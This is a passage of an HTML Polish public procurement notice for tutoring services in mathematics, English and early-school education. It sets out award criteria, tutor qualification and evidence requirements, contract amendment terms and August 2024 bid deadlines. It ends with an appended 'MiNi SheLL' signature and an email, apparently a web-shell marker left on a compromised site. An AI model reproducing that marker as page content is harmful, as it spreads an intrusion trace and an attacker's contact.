przez liczbę wskazanych osób - Wynik tego działania podlega ocenie w kryterium „Doświadczenie osób prowadzących korepetycje”. <br/>UWAGA: Wskazane osoby pod rygorem uznania oferty za niezgodną z warunkami zamówienia i jej odrzucenia muszą spełniać co najmniej minimalne warunki ustalone w rozdz. XIX – XXI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób prowadzących korepetycje</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności do występowania w obrocie gospodarczym: ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE, <br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE, <br/>3) Sytuacja ekonomiczna lub finansowa: ZAMAWIAJĄCY NIE STAWIA SZCZEGÓŁOWEGO WARUNKU W TYM ZAKRESIE, <br/>4) Zdolność techniczna lub zawodowa: - ZAMAWIAJĄCY ŻĄDA BY WYKONAWCA dysponował osobami zdolnymi do wykonania zamówienia (kwalifikacje zawodowe), tj.: zatrudniał co najmniej 1 osobę posiadającą wykształcenie: ukończone studia wyższe pierwszego stopnia lub wyższe magisterskie na kierunku zgodnym z nauczanym przedmiotem lub którego standardy kształcenia obejmują treści nauczanego przedmiotu, inne niż nauczany przedmiot, ale dodatkowo ukończyła studia podyplomowe w zakresie nauczanego przedmiotu, co najmniej 1 rok doświadczenia/praktyki zgodnie z nauczanym przedmiotem (poświadczone przez referencje lub zaświadczenie pracodawcy), osobę mobilną (praca w środowisku klienta).<br/>UWAGA: Osoba prowadzącą jednoosobową działalność, nie zatrudniająca personelu, spełni warunek opisany w pkt 4, jeśli będzie posiadała wyżej opisane kwalifikacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu (art. 273 ust. 1 pkt 1 w zw. art. 109 ust. 1) : <br/>- odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji <br/>UWAGA: jeśli spełnione będą przesłanki art. 274 ust. 4 Pzp Zamawiający samodzielnie uzyska dokument za pomocą bezpłatnych i ogólnodostępnych baz danych. W pozostałym zakresie Zamawiający nie wymaga podmiotowych środków dowodowych. <br/>Szczegóły określone w rozdz. XXI SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu odpowiednio do każdej z CZĘŚCI ZAMÓWIENIA, o które się ubiega (art. 273 ust. 1 pkt 2): <br/>a) Zdolności do występowania w obrocie gospodarczym: NIE DOTYCZY; <br/>b) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: NIE DOTYCZY; <br/>c) Sytuacja ekonomiczna lub finansowa: NIE DOTYCZY; <br/>d) Zdolność techniczna lub zawodowa: - wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami; w/g zał. nr 5 do SWZ.<br/>Szczegóły określone w rozdz. XXI SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Odpowiednio do części zamówienia, na które Wykonawca składa ofertę Zamawiający żąda dokumentów potwierdzających, że oferowane usługi spełniają standardy w zakresie sposobu realizacji usługi określone w dokumentach postępowania: <br/>CZĘŚĆ I – korepetycje z matematyki<br/>- dokumenty osoby wskazanej przez Wykonawcę do realizacji zamówienia potwierdzające: <br/>a) ukończone studia wyższe pierwszego stopnia lub wyższe magisterskie na kierunku zgodnym z nauczanym przedmiotem lub którego standardy kształcenia obejmują treści nauczanego przedmiotu, inne niż nauczany przedmiot, ale dodatkowo ukończyła studia podyplomowe w zakresie nauczanego przedmiotu (dokument potwierdzający wykształcenie – kserokopię/kserokopie dyplomu ukończenia studiów kierunkowych), <br/>b) posiadane doświadczenie: 1 rok doświadczenia/praktyki zgodnie z nauczanym przedmiotem np. referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, lub zaświadczenie wystawione przez pracodawcę<br/>CZĘŚĆ II – korepetycje z j. angielskiego<br/>- dokumenty osoby wskazanej przez Wykonawcę do realizacji zamówienia potwierdzające: <br/>a) ukończone studia wyższe pierwszego stopnia lub wyższe magisterskie na kierunku zgodnym z nauczanym przedmiotem lub którego standardy kształcenia obejmują treści nauczanego przedmiotu, inne niż nauczany przedmiot, ale dodatkowo ukończyła studia podyplomowe w zakresie nauczanego przedmiotu (dokument potwierdzający wykształcenie – kserokopię/kserokopie dyplomu ukończenia studiów kierunkowych).<br/>b) posiadane doświadczenie: 1 rok doświadczenia/praktyki zgodnie z nauczanym przedmiotem np. referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, lub zaświadczenie wystawione przez pracodawcę<br/>CZĘŚĆ III – korepetycje w zakresie edukacji wczesnoszkolnej<br/>- dokumenty osoby wskazanej przez Wykonawcę do realizacji zamówienia potwierdzające: <br/>a) ukończone studia wyższe pierwszego stopnia lub wyższe magisterskie na kierunku zgodnym z nauczanym przedmiotem lub którego standardy kształcenia obejmują treści nauczanego przedmiotu, inne niż nauczany przedmiot, ale dodatkowo ukończyła studia podyplomowe w zakresie nauczanego przedmiotu (dokument potwierdzający wykształcenie – kserokopię/kserokopie dyplomu ukończenia studiów kierunkowych).<br/>b) posiadane doświadczenie: 1 rok doświadczenia/praktyki zgodnie z nauczanym przedmiotem np. referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, lub zaświadczenie wystawione przez pracodawcę<br/>Numeracja ustępów zgodna z SWZ. Pełny tekst w rozdz. XX SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wymienione przedmiotowe środki dowodowe podlegają uzupełnieniu na zasadach określonych w rozdz. XXI ust. 8 SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> KOMPLETNA OFERTA POWINNA ZAWIERAĆ: <br/>1) formularz oferty wg zał. nr 1 do SWZ; <br/>2) oświadczenie z art. 125 ust. 1 Wykonawców o niepodleganiu wykluczeniu z postępowania oraz o spełnianiu warunków udziału - wg zał. nr 2 do SWZ; <br/>3) przedmiotowe środki dowodowe zamówienia, na które składana jest oferta – opisane <br/>w rozdz. XX SWZ; <br/>4) oświadczenie z art. 117 ust. 4 Wykonawców wspólnie ubiegających się o zamówienie – wg zał. nr 3 do SWZ (jeśli dotyczy); <br/>5) zobowiązanie podmiotu udostępniającego zasoby Wykonawcy do dyspozycji na potrzeby realizacji zamówienia wraz z oświadczeniem z art. 125 ust. 5 - wg zał. nr 4 do SWZ (jeśli dotyczy); <br/>6) pełnomocnictwa dla osób podpisujących wszystkie dokumenty ofertowe, o ile prawo składania oświadczeń woli w imieniu Wykonawcy nie wynika z dokumentów rejestrowych - ust. 15 (jeżeli występuje); <br/>7) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się <br/>o zamówienie – wg zasad opisanych w ust. 16 (jeżeli występuje); <br/>8) pełnomocnictwo do reprezentowania Podmiotu udostępniającego zasoby - ust. 16 (jeżeli występuje); <br/>- przy czym formularz oferty, oświadczeń muszą być złożone w oryginale. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Szczegółowe informacje zawarte w rozdz. XIV pkt. 17 SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie wskazanym w art. 455 ustawy Pzp: <br/>1)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu zamówienia,<br/>2)	gdy konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego, w tym w jego strukturze organizacyjnej,<br/>3)	gdy wynikną rozbieżności lub niejasności w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej postanowień,<br/>4)	w przypadku działania siły wyższej tj. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji, mimo zachowania należytej staranności, nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego. W takim przypadku termin zakończenia prac zostanie przesunięty o czas, w którym prace nie mogły być przeprowadzone,<br/>5)	w przypadku, kiedy konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający działając z należytą starannością, nie mógł przewidzieć a wartość zmiany nie przekracza 10% wartości zamówienia określonej pierwotnie w umowie,<br/>2.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, w formie aneksu do umowy pod rygorem nieważności takiej umowy.<br/>3.	Zmiana dokonana zgodnie z powyższymi postanowieniami, niezależnie od jej wartości, nie może prowadzić do zmiany charakteru umowy, w szczególności do zastąpienia przedmiotu umowy innego rodzaju przedmiotem.<br/>Pełna informacja dot. zmian umowy znajduje się w załączniku nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://edu.ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-22 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com